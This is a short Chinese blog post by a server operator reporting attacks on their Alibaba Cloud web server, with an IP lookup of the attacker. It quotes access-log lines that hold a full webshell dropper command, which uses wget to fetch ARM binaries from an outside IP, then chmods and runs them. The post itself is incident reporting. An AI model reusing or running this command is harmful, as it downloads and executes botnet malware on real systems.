【windows10】 关于http服务器遭受webshell攻击
1、背景
在阿里云公网上部署web服务器,最近客户反映我的服务经常断掉,查看后台日志,发现*的IP攻击。
比如:
209.141.56.212 - - [17/Sep/2021 04:52:04] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3;wget+http:/\/154.16.118.104/arm;chmod+777+arm;./arm+0day.jawsv3 HTTP/1.1[0m" 404 -
如下图:
2、ip地址查询
我使用的是马老师家的IP地址库查询:
https://ip.taobao.com/?spm=a2c4g.11186623.0.0.2f953788CNPh0g
比如下面查询日志中可以的IP:
209.141.56.212
3、可疑请求ip
209.141.56.212
209.141.56.212 - - [17/Sep/2021 05:29:09] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3;wget+http:/\/154.16.118.104/arm;chmod+777+arm;./arm+0day.jawsv3 HTTP/1.1[0m" 404 -